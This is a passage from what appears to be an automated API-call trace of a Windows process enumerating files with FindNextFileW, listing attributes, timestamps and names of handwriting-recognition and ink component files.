lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0044.159] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0044.160] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0044.161] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0044.161] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0044.161] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0044.161] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0044.161] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0044.161] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0044.161] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0044.162] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0044.162] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0044.162] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0044.162] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0044.162] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0044.162] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0044.163] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0044.163] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0044.163] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0044.163] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0044.163] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0044.163] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0044.163] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0044.164] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0044.164] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0044.164] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc49d13, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5dc49d13, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0044.164] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0044.164] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0044.164] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0044.164] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63de1b63, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x63de1b63, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a991650, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, 